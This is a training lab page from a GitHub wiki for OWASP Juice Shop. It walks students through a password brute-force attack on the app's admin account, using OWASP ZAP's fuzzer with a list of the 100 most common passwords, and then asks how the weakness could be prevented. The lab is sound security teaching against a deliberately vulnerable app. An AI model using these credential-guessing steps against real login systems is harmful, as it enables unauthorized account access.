Lab 05 Broken Authentication - Muamaidbengt/juice-shop GitHub Wiki

Broken authentication

Challenge "Password strength"

One (naive) way to gain entry to a password-protected system is to simply try all possible password combinations, for example by first trying "a", then "b", and so on until you reach "ZZZZZZZZZZ" or something similar. However, since passwords are often not chosen at random, you can speed up this time-consuming process by making more selective guesses. You can easily find lists of varying length containing the most commonly used passwords. By feeding these to a fuzzer, the fuzzer can try each of them for you.

This lab assumes that the attacker (i.e. you) knows there is an admin account named [email protected], but doesn't know the password for it.

Preparations

  1. Download the password dictionary containing the top 100 most commonly used passwords to your computer.
  2. Start OWASP ZAP.
  3. Choose to manually explore your application.
  4. Launch Firefox with ZAP as a proxy by selecting Firefox in the dropdown and then clicking the "Launch Browser" button. This means that ZAP will intercept and analyze all traffic between your browser and the web server.

Record a login attempt in ZAP

  1. Enter your Juice Shop url.
  2. Go to the Login page and attempt to login using [email protected] as the username and replaceme as the password.
  3. Check the History tab in ZAP.
  4. Select the most recent HTTP POST request and inspect the request and response.

Use the recorded login attempt as a template

  1. Right click the POST request and choose Attack -> Fuzz.
  2. In the bottom-left section, you can see the Body of the HTTP POST request you triggered manually.
  3. In the Body, select the string replaceme and then click Add.
  4. Click Add and add a File payload, using the dictionary you downloaded in step 1 as the source. This means ZAP will repeat the HTTP POST request once for each password from the password dictionary (i.e. 100 times).

Use ZAP to perform a password brute force attack on the Juice Shop

  1. Start the Fuzzer and wait a couple of seconds for it to complete.
  2. The fuzzer output pane displays the HTTP status code and response body for each request, along with the password that was used for it.
  3. Check if any of the fuzzed requests generated anything useful.

Questions

  • What is the password for [email protected]?
  • It's demonstrably possible to perform a brute-force attack to gain unauthorized access to the system. How could this vulnerability be negated in this type of application?

Recommended reading